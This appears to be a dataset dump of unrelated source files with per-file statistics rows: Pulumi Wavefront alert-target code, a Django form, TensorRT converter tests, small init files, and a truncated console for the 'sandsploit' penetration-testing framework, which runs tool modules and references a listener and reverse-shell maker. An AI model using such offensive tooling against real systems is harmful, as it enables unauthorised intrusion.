:param pulumi.Input[str] email_subject: The subject title of an email notification target.
:param pulumi.Input[bool] is_html_content: Determine whether the email alert content is sent as HTML or text.
:param pulumi.Input[str] method: The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
:param pulumi.Input[str] name: The name of the alert target as it is displayed in wavefront
:param pulumi.Input[str] recipient: The end point for the notification Target. `EMAIL`: email address. `PAGERDUTY`: PagerDuty
routing key. `WEBHOOK`: URL endpoint.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertTargetRouteArgs']]]] routes: List of routing targets that this alert target will notify. See Route
:param pulumi.Input[str] template: A mustache template that will form the body of the POST request, email and summary of the PagerDuty.
:param pulumi.Input[Sequence[pulumi.Input[str]]] triggers: A list of occurrences on which this webhook will be fired. Valid values are `ALERT_OPENED`,
`ALERT_UPDATED`, `ALERT_RESOLVED`, `ALERT_MAINTENANCE`, `ALERT_SNOOZED`, `ALERT_NO_DATA`, `ALERT_NO_DATA_RESOLVED`, `ALERT_NO_DATA_MAINTENANCE`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AlertTargetArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a wavefront Alert Target resource. This allows alert targets to created, updated, and deleted.
## Example Usage
```python
import pulumi
import pulumi_wavefront as wavefront
test_target = wavefront.AlertTarget("testTarget",
content_type="application/json",
custom_headers={
"Testing": "true",
},
description="Test target",
method="WEBHOOK",
recipient="https://hooks.slack.com/services/test/me",
template="{}",
triggers=[
"ALERT_OPENED",
"ALERT_RESOLVED",
])
```
## Attributes Reference
* `target_id` - The target ID prefixed with `target:` for interpolating into a Wavefront Alert.
### Route
The `route` mapping supports the following:
* `method` - (Required) The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
* `target` - (Required) The endpoint for the alert route. `EMAIL`: email address. `PAGERDUTY`: PagerDuty routing
key. `WEBHOOK`: URL endpoint.
* `filter` - (Required) String that filters the route. Space delimited. Currently only allows a single key value pair.
(e.g. `env prod`)
### Example
```python
import pulumi
import pulumi_wavefront as wavefront
test_target = wavefront.AlertTarget("testTarget",
content_type="application/json",
custom_headers={
"Testing": "true",
},
description="Test target",
method="WEBHOOK",
recipient="https://hooks.slack.com/services/test/me",
routes=[
wavefront.AlertTargetRouteArgs(
filter={
"key": "env",
"value": "prod",
},
method="WEBHOOK",
target="https://hooks.slack.com/services/test/me/prod",
),
wavefront.AlertTargetRouteArgs(
filter={
"key": "env",
"value": "dev",
},
method="WEBHOOK",
target="https://hooks.slack.com/services/test/me/dev",
),
],
template="{}",
triggers=[
"ALERT_OPENED",
"ALERT_RESOLVED",
])
```
## Import
Alert Targets can be imported using the `id`, e.g.
```sh
$ pulumi import wavefront:index/alertTarget:AlertTarget alert_target abcdEFGhijKLMNO
```
:param str resource_name: The name of the resource.
:param AlertTargetArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AlertTargetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
content_type: Optional[pulumi.Input[str]] = None,
custom_headers: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
email_subject: Optional[pulumi.Input[str]] = None,
is_html_content: Optional[pulumi.Input[bool]] = None,
method: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
recipient: Optional[pulumi.Input[str]] = None,
routes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertTargetRouteArgs']]]]] = None,
template: Optional[pulumi.Input[str]] = None,
triggers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AlertTargetArgs.__new__(AlertTargetArgs)
__props__.__dict__["content_type"] = content_type
__props__.__dict__["custom_headers"] = custom_headers
if description is None and not opts.urn:
raise TypeError("Missing required property 'description'")
__props__.__dict__["description"] = description
__props__.__dict__["email_subject"] = email_subject
__props__.__dict__["is_html_content"] = is_html_content
__props__.__dict__["method"] = method
__props__.__dict__["name"] = name
if recipient is None and not opts.urn:
raise TypeError("Missing required property 'recipient'")
__props__.__dict__["recipient"] = recipient
__props__.__dict__["routes"] = routes
if template is None and not opts.urn:
raise TypeError("Missing required property 'template'")
__props__.__dict__["template"] = template
if triggers is None and not opts.urn:
raise TypeError("Missing required property 'triggers'")
__props__.__dict__["triggers"] = triggers
__props__.__dict__["target_id"] = None
super(AlertTarget, __self__).__init__(
'wavefront:index/alertTarget:AlertTarget',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
content_type: Optional[pulumi.Input[str]] = None,
custom_headers: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
email_subject: Optional[pulumi.Input[str]] = None,
is_html_content: Optional[pulumi.Input[bool]] = None,
method: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
recipient: Optional[pulumi.Input[str]] = None,
routes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertTargetRouteArgs']]]]] = None,
target_id: Optional[pulumi.Input[str]] = None,
template: Optional[pulumi.Input[str]] = None,
triggers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'AlertTarget':
"""
Get an existing AlertTarget resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] content_type: The value of the `Content-Type` header of the webhook.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] custom_headers: A `string->string` map specifying the custome HTTP header key/value pairs that will be
sent in the requests with a method of `WEBHOOK`.
:param pulumi.Input[str] description: Description describing this alert target.
:param pulumi.Input[str] email_subject: The subject title of an email notification target.
:param pulumi.Input[bool] is_html_content: Determine whether the email alert content is sent as HTML or text.
:param pulumi.Input[str] method: The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
:param pulumi.Input[str] name: The name of the alert target as it is displayed in wavefront
:param pulumi.Input[str] recipient: The end point for the notification Target. `EMAIL`: email address. `PAGERDUTY`: PagerDuty
routing key. `WEBHOOK`: URL endpoint.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertTargetRouteArgs']]]] routes: List of routing targets that this alert target will notify. See Route
:param pulumi.Input[str] template: A mustache template that will form the body of the POST request, email and summary of the PagerDuty.
:param pulumi.Input[Sequence[pulumi.Input[str]]] triggers: A list of occurrences on which this webhook will be fired. Valid values are `ALERT_OPENED`,
`ALERT_UPDATED`, `ALERT_RESOLVED`, `ALERT_MAINTENANCE`, `ALERT_SNOOZED`, `ALERT_NO_DATA`, `ALERT_NO_DATA_RESOLVED`, `ALERT_NO_DATA_MAINTENANCE`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _AlertTargetState.__new__(_AlertTargetState)
__props__.__dict__["content_type"] = content_type
__props__.__dict__["custom_headers"] = custom_headers
__props__.__dict__["description"] = description
__props__.__dict__["email_subject"] = email_subject
__props__.__dict__["is_html_content"] = is_html_content
__props__.__dict__["method"] = method
__props__.__dict__["name"] = name
__props__.__dict__["recipient"] = recipient
__props__.__dict__["routes"] = routes
__props__.__dict__["target_id"] = target_id
__props__.__dict__["template"] = template
__props__.__dict__["triggers"] = triggers
return AlertTarget(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="contentType")
def content_type(self) -> pulumi.Output[Optional[str]]:
"""
The value of the `Content-Type` header of the webhook.
"""
return pulumi.get(self, "content_type")
@property
@pulumi.getter(name="customHeaders")
def custom_headers(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A `string->string` map specifying the custome HTTP header key/value pairs that will be
sent in the requests with a method of `WEBHOOK`.
"""
return pulumi.get(self, "custom_headers")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
Description describing this alert target.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="emailSubject")
def email_subject(self) -> pulumi.Output[Optional[str]]:
"""
The subject title of an email notification target.
"""
return pulumi.get(self, "email_subject")
@property
@pulumi.getter(name="isHtmlContent")
def is_html_content(self) -> pulumi.Output[Optional[bool]]:
"""
Determine whether the email alert content is sent as HTML or text.
"""
return pulumi.get(self, "is_html_content")
@property
@pulumi.getter
def method(self) -> pulumi.Output[Optional[str]]:
"""
The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
"""
return pulumi.get(self, "method")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the alert target as it is displayed in wavefront
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def recipient(self) -> pulumi.Output[str]:
"""
The end point for the notification Target. `EMAIL`: email address. `PAGERDUTY`: PagerDuty
routing key. `WEBHOOK`: URL endpoint.
"""
return pulumi.get(self, "recipient")
@property
@pulumi.getter
def routes(self) -> pulumi.Output[Optional[Sequence['outputs.AlertTargetRoute']]]:
"""
List of routing targets that this alert target will notify. See Route
"""
return pulumi.get(self, "routes")
@property
@pulumi.getter(name="targetId")
def target_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "target_id")
@property
@pulumi.getter
def template(self) -> pulumi.Output[str]:
"""
A mustache template that will form the body of the POST request, email and summary of the PagerDuty.
"""
return pulumi.get(self, "template")
@property
@pulumi.getter
def triggers(self) -> pulumi.Output[Sequence[str]]:
"""
A list of occurrences on which this webhook will be fired. Valid values are `ALERT_OPENED`,
`ALERT_UPDATED`, `ALERT_RESOLVED`, `ALERT_MAINTENANCE`, `ALERT_SNOOZED`, `ALERT_NO_DATA`, `ALERT_NO_DATA_RESOLVED`, `ALERT_NO_DATA_MAINTENANCE`.
"""
return pulumi.get(self, "triggers")
| 44.131802 | 171 | 0.626599 | 4,134 | 36,497 | 5.358007 | 0.059507 | 0.094357 | 0.077743 | 0.057607 | 0.908488 | 0.886637 | 0.872009 | 0.851242 | 0.844244 | 0.829481 | 0 | 0.000037 | 0.264433 | 36,497 | 826 | 172 | 44.18523 | 0.825039 | 0.406335 | 0 | 0.756892 | 1 | 0 | 0.091894 | 0.003297 | 0 | 0 | 0 | 0 | 0 | 1 | 0.162907 | false | 0.002506 | 0.017544 | 0.005013 | 0.278195 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b1a6f984b5e780b6f21a01ce21297f5892df2fbd | 1,267 | py | Python | meal_plan_app/forms.py | JoelRice/Plan-Shop-Eat | 2646c918199e1c8857aeaaadacc4c656fb9f2170 | [
"MIT"
] | 2 | 2021-10-05T15:57:00.000Z | 2022-03-02T14:36:01.000Z | meal_plan_app/forms.py | JoelRice/Plan-Shop-Eat | 2646c918199e1c8857aeaaadacc4c656fb9f2170 | [
"MIT"
] | 17 | 2021-10-06T14:44:25.000Z | 2021-10-19T15:03:30.000Z | meal_plan_app/forms.py | JoelRice/Plan-Shop-Eat | 2646c918199e1c8857aeaaadacc4c656fb9f2170 | [
"MIT"
] | null | null | null | from django import forms
from recipe_app.models import Recipe
from meal_plan_app.models import MealPlan
class CreateMealPlanForm(forms.Form):
recipes = Recipe.objects.all()
plan_title = forms.CharField(max_length=50, required=True)
monday = forms.ModelMultipleChoiceField(
queryset=recipes,
required=False,
widget=forms.CheckboxSelectMultiple
)
tuesday = forms.ModelMultipleChoiceField(
queryset=recipes,
required=False,
widget=forms.CheckboxSelectMultiple
)
wednesday = forms.ModelMultipleChoiceField(
queryset=recipes,
required=False,
widget=forms.CheckboxSelectMultiple
)
thursday = forms.ModelMultipleChoiceField(
queryset=recipes,
required=False,
widget=forms.CheckboxSelectMultiple
)
friday = forms.ModelMultipleChoiceField(
queryset=recipes,
required=False,
widget=forms.CheckboxSelectMultiple
)
saturday = forms.ModelMultipleChoiceField(
queryset=recipes,
required=False,
widget=forms.CheckboxSelectMultiple
)
sunday = forms.ModelMultipleChoiceField(
queryset=recipes,
required=False,
widget=forms.CheckboxSelectMultiple
)
| 27.543478 | 62 | 0.689029 | 104 | 1,267 | 8.346154 | 0.336538 | 0.233871 | 0.298387 | 0.354839 | 0.725806 | 0.725806 | 0.725806 | 0.725806 | 0.725806 | 0 | 0 | 0.002081 | 0.241515 | 1,267 | 45 | 63 | 28.155556 | 0.901145 | 0 | 0 | 0.512195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.073171 | 0 | 0.317073 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
49599fb181f7349e86ce1bd18ccdb93972c1ba45 | 3,981 | py | Python | py/torch_tensorrt/fx/test/converters/acc_op/test_logical_or.py | hassan11196/Torch-TensorRT | a2d0d0e935bf223523a7c28d7814cdbd32f323b2 | [
"BSD-3-Clause"
] | null | null | null | py/torch_tensorrt/fx/test/converters/acc_op/test_logical_or.py | hassan11196/Torch-TensorRT | a2d0d0e935bf223523a7c28d7814cdbd32f323b2 | [
"BSD-3-Clause"
] | 1 | 2022-03-15T06:35:59.000Z | 2022-03-15T06:35:59.000Z | py/torch_tensorrt/fx/test/converters/acc_op/test_logical_or.py | hassan11196/Torch-TensorRT | a2d0d0e935bf223523a7c28d7814cdbd32f323b2 | [
"BSD-3-Clause"
] | null | null | null | import torch
import torch_tensorrt.fx.tracer.acc_tracer.acc_ops as acc_ops
from parameterized import parameterized
from torch.testing._internal.common_fx2trt import AccTestCase
from torch.testing._internal.common_utils import run_tests
class TestLogicalOrMethodSimpleConverter(AccTestCase):
@parameterized.expand(
[
("rand_2d_bool_bool", torch.randn(3, 4) > 0, torch.randn(3, 4) > 0),
("rand_3d_bool_bool", torch.randn(3, 4, 5) > 0, torch.randn(3, 4, 5) > 0),
(
"rand_4d_bool_bool",
torch.randn(3, 4, 5, 6) > 0,
torch.randn(3, 4, 5, 6) > 0,
),
("rand_2d_bool_single_bool", torch.randn(3, 4) > 0, torch.tensor(0) > 0),
(
"rand_2d_int_bool",
torch.randn(3, 4).to(torch.int),
torch.randn(3, 4) > 0,
),
(
"rand_2d_int_single_bool",
torch.randn(3, 4).to(torch.int),
torch.tensor(0) > 0,
),
]
)
def test_logical_or(self, _, input, other):
class LogicalOr(torch.nn.Module):
def forward(self, x, y):
return x.logical_or(y)
inputs = [
input,
other,
]
self.run_test(
LogicalOr(),
inputs,
expected_ops={acc_ops.logical_or},
test_implicit_batch_dim=False,
)
class TestLogicalOrFunctionSimpleConverter(AccTestCase):
@parameterized.expand(
[
("rand_2d_bool_bool", torch.randn(3, 4) > 0, torch.randn(3, 4) > 0),
("rand_3d_bool_bool", torch.randn(3, 4, 5) > 0, torch.randn(3, 4, 5) > 0),
(
"rand_4d_bool_bool",
torch.randn(3, 4, 5, 6) > 0,
torch.randn(3, 4, 5, 6) > 0,
),
("rand_2d_bool_single_bool", torch.randn(3, 4) > 0, torch.tensor(0) > 0),
(
"rand_2d_int_bool",
torch.randn(3, 4).to(torch.int),
torch.randn(3, 4) > 0,
),
(
"rand_2d_int_single_bool",
torch.randn(3, 4).to(torch.int),
torch.tensor(0) > 0,
),
]
)
def test_logical_or(self, _, input, other):
class LogicalOr(torch.nn.Module):
def forward(self, x, y):
return torch.logical_or(x, y)
inputs = [
input,
other,
]
self.run_test(
LogicalOr(),
inputs,
expected_ops={acc_ops.logical_or},
test_implicit_batch_dim=False,
)
class TestLogicalOrOperatorSimpleConverter(AccTestCase):
@parameterized.expand(
[
("rand_2d_bool_bool", torch.randn(3, 4) > 0, torch.randn(3, 4) > 0),
("rand_3d_bool_bool", torch.randn(3, 4, 5) > 0, torch.randn(3, 4, 5) > 0),
(
"rand_4d_bool_bool",
torch.randn(3, 4, 5, 6) > 0,
torch.randn(3, 4, 5, 6) > 0,
),
("rand_2d_bool_single_bool", torch.randn(3, 4) > 0, torch.tensor(0) > 0),
(
"rand_2d_int_bool",
torch.randn(3, 4).to(torch.int),
torch.randn(3, 4) > 0,
),
(
"rand_2d_int_single_bool",
torch.randn(3, 4).to(torch.int),
torch.tensor(0) > 0,
),
]
)
def test_logical_or(self, _, input, other):
class LogicalOr(torch.nn.Module):
def forward(self, x, y):
return x | y
inputs = [
input,
other,
]
self.run_test(
LogicalOr(),
inputs,
expected_ops={acc_ops.logical_or},
test_implicit_batch_dim=False,
)
if __name__ == "__main__":
run_tests()
| 30.623077 | 86 | 0.478523 | 459 | 3,981 | 3.910675 | 0.132898 | 0.167131 | 0.183844 | 0.200557 | 0.837883 | 0.804457 | 0.804457 | 0.804457 | 0.804457 | 0.804457 | 0 | 0.055256 | 0.395378 | 3,981 | 129 | 87 | 30.860465 | 0.690486 | 0 | 0 | 0.686441 | 0 | 0 | 0.087918 | 0.035418 | 0 | 0 | 0 | 0 | 0 | 1 | 0.050847 | false | 0 | 0.042373 | 0.025424 | 0.169492 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
498a4518eda369cec7c244f5aad2519fa9734546 | 208 | py | Python | ext/opentelemetry-ext-django/tests/views.py | vmihailenco/opentelemetry-python | 0a9eba3bb62f4ddf686b55b68286979a5ec84de5 | [
"Apache-2.0"
] | null | null | null | ext/opentelemetry-ext-django/tests/views.py | vmihailenco/opentelemetry-python | 0a9eba3bb62f4ddf686b55b68286979a5ec84de5 | [
"Apache-2.0"
] | null | null | null | ext/opentelemetry-ext-django/tests/views.py | vmihailenco/opentelemetry-python | 0a9eba3bb62f4ddf686b55b68286979a5ec84de5 | [
"Apache-2.0"
] | null | null | null | from django.http import HttpResponse
def traced(request): # pylint: disable=unused-argument
return HttpResponse()
def error(request): # pylint: disable=unused-argument
raise ValueError("error")
| 20.8 | 55 | 0.745192 | 24 | 208 | 6.458333 | 0.666667 | 0.193548 | 0.258065 | 0.335484 | 0.43871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 208 | 9 | 56 | 23.111111 | 0.880682 | 0.302885 | 0 | 0 | 0 | 0 | 0.035211 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
499a6f130ca173aca52488c7b0ac4a44d0a4e4e0 | 209 | py | Python | taxdata/puf/__init__.py | jdebacker/taxdata | c32d401a10a6c8f6e889d87c6cc72fd4338017b2 | [
"CC0-1.0"
] | 12 | 2019-02-07T14:06:28.000Z | 2021-12-04T19:19:50.000Z | taxdata/puf/__init__.py | jdebacker/taxdata | c32d401a10a6c8f6e889d87c6cc72fd4338017b2 | [
"CC0-1.0"
] | 230 | 2015-10-20T18:38:10.000Z | 2018-12-05T16:04:04.000Z | taxdata/puf/__init__.py | jdebacker/taxdata | c32d401a10a6c8f6e889d87c6cc72fd4338017b2 | [
"CC0-1.0"
] | 19 | 2015-12-21T18:25:11.000Z | 2018-11-10T16:53:38.000Z | # flake8: noqa
from taxdata.puf.preppuf import preppuf
from taxdata.puf import impute_itmexp
from taxdata.puf import impute_pencon
from taxdata.puf.finalprep import finalprep
from taxdata.puf import constants
| 29.857143 | 43 | 0.84689 | 31 | 209 | 5.645161 | 0.387097 | 0.314286 | 0.4 | 0.342857 | 0.297143 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005376 | 0.110048 | 209 | 6 | 44 | 34.833333 | 0.935484 | 0.057416 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
b8f54387c84d14ce125549864549254c82b66305 | 150 | py | Python | pen_plots/util/__init__.py | DiddiZ/pen-plots | 422c219f1682693f8f373308ff7f9f0f58eeff56 | [
"MIT"
] | null | null | null | pen_plots/util/__init__.py | DiddiZ/pen-plots | 422c219f1682693f8f373308ff7f9f0f58eeff56 | [
"MIT"
] | null | null | null | pen_plots/util/__init__.py | DiddiZ/pen-plots | 422c219f1682693f8f373308ff7f9f0f58eeff56 | [
"MIT"
] | null | null | null | from pen_plots.util.download import download
from pen_plots.util.matplotlib import show_strokes
from pen_plots.util.timer import MultiTimer, Timer
| 37.5 | 51 | 0.846667 | 23 | 150 | 5.347826 | 0.478261 | 0.170732 | 0.292683 | 0.390244 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106667 | 150 | 3 | 52 | 50 | 0.91791 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
621095c92b28740bb9690a925fbd2e1b30cc6153 | 70 | py | Python | facebook/tests/__init__.py | fabiangermann/django-facebook-graph | e63039c94a50f293ae79e8ecda24a9c7d1b61c68 | [
"Apache-2.0"
] | 1 | 2015-09-24T00:36:28.000Z | 2015-09-24T00:36:28.000Z | facebook/tests/__init__.py | fabiangermann/django-facebook-graph | e63039c94a50f293ae79e8ecda24a9c7d1b61c68 | [
"Apache-2.0"
] | null | null | null | facebook/tests/__init__.py | fabiangermann/django-facebook-graph | e63039c94a50f293ae79e8ecda24a9c7d1b61c68 | [
"Apache-2.0"
] | null | null | null | from facebook.tests.utils import *
from facebook.tests.users import *
| 23.333333 | 34 | 0.8 | 10 | 70 | 5.6 | 0.6 | 0.428571 | 0.607143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 70 | 2 | 35 | 35 | 0.903226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
622146ec1e592c0dd2863464bedbd32519b6c10d | 328 | py | Python | tests2/exception.py | Nlioxa/QA-Labs | 211cbfb9e8be50e8192d4097c8c4f3f71c9bb59b | [
"MIT"
] | null | null | null | tests2/exception.py | Nlioxa/QA-Labs | 211cbfb9e8be50e8192d4097c8c4f3f71c9bb59b | [
"MIT"
] | null | null | null | tests2/exception.py | Nlioxa/QA-Labs | 211cbfb9e8be50e8192d4097c8c4f3f71c9bb59b | [
"MIT"
] | null | null | null | class TrueException(Exception):
def __init__(self, message="message"):
self.message = message
def printMessage(self):
print(self.message)
class FalseException(Exception):
def __init__(self, message="message"):
self.message = message
def printMessage(self):
print(self.message) | 23.428571 | 42 | 0.667683 | 34 | 328 | 6.205882 | 0.294118 | 0.312796 | 0.341232 | 0.189573 | 0.824645 | 0.824645 | 0.824645 | 0.824645 | 0.824645 | 0.824645 | 0 | 0 | 0.222561 | 328 | 14 | 43 | 23.428571 | 0.827451 | 0 | 0 | 0.8 | 0 | 0 | 0.042553 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0 | 0.6 | 0.4 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 12 |
62308050e11f160f5c2f6199cb1515ec267f83f4 | 103 | py | Python | ips/ip/spi_slave_0_base/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | ips/ip/spi_slave_0_base/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | ips/ip/spi_slave_0_base/__init__.py | zld012739/zldrepository | 5635b78a168956091676ef4dd99fa564be0e5ba0 | [
"MIT"
] | null | null | null | from spi_slave_0_base_partial import get_ip_name
from spi_slave_0_base_partial import SPI_SLAVE_0_BASE
| 34.333333 | 53 | 0.92233 | 21 | 103 | 3.904762 | 0.47619 | 0.292683 | 0.329268 | 0.47561 | 0.731707 | 0.731707 | 0.731707 | 0 | 0 | 0 | 0 | 0.031579 | 0.07767 | 103 | 2 | 54 | 51.5 | 0.831579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
627ebd54f923a8ec58a973e6e767db2c4d5dd42b | 8,455 | py | Python | project/lib/console.py | invisble-rabbit/sandsploit | ebbf9439396e668c08ad96f50fff37cddbca1b18 | [
"Apache-2.0"
] | 1 | 2020-02-26T13:14:37.000Z | 2020-02-26T13:14:37.000Z | project/lib/console.py | invisble-rabbit/sandsploit | ebbf9439396e668c08ad96f50fff37cddbca1b18 | [
"Apache-2.0"
] | null | null | null | project/lib/console.py | invisble-rabbit/sandsploit | ebbf9439396e668c08ad96f50fff37cddbca1b18 | [
"Apache-2.0"
] | null | null | null | #CopyRight Apache-2.0
#Powered By Python 3.X
#Author : @Aμιρ-0x0 (AMJ)
#import libs
import os , sys ,readline , re , platform,signal
from colorama import Fore
from os.path import expanduser
from lib.banner import banner
from lib.update import update
from lib.version import version
from lib.completor import *
from lib.upgrade import upgrade
from core.listener import *
from core.rsmaker import RSMaker
from datetime import datetime
##################################################
def controlc_signal(signal,frame):
print ("\nInterrupt: use the 'exit' command to quit")
#Console Function
def console():
path = None
toolpart =None
#File lists Function
def mp(path):
for root,dirs,files in os.walk(path):
for f in files:
print (f)
#list Function
def list():
print ("\nTools\n===============")
mp(path)
try:
while True:
signal.signal(signal.SIGINT,controlc_signal)
#Get PWD
signal.signal(signal.SIGINT,controlc_signal)
getcwd = os.getcwd()
getdir = getcwd.split("/")
pwd = getdir[-1]
#Get LocalHost Name
plat = platform.node()
#Nothing Special :)
point = "→"
#Check Tools Part Directory
if path == None:
None
else:
pth = path.split("/")
toolpart = pth[-2]
#Promot
option = input (Fore.RESET+"\n[SSF@%s](%s){%s} %s "%(plat,pwd,toolpart,point))
option2 = option.split(" ")
#Conditions
if option2[0] == "cd":
def cd(path):
os.chdir(os.path.expanduser(path))
try:
cd(option2[1])
except:
print ("ERROR: No such file or directory: ",option2[1])
elif option2[0] == 'run':
try:
if option == "run":
print ("enter help to see how to use this command")
else:
run = option.split("run ")[1]
run2 = path+run
#exec(open(run2).read())
exst = os.path.isfile(run2)
if exst:
os.system(run2)
else :
print ("Cannot find executable file")
except:
print ("Error !!!")
elif option2[0] == 'use':
try:
check = "/opt/sandsploit/module/%s/"%option2[1]
exist = os.path.isdir(check)
if exist:
path = check
else:
print ("Part not Found")
except:
print ("Part Not Found")
elif option == 'list':
if path == None:
print("\nTools\n===============")
print ("Tools NotFound")
else:
list()
elif option == 'help':
#Menu
print ('''
Command Description
======== ============
banner Change Banner
bash Run Bash Shell
list List of tools for each section
listener Sniffing Port
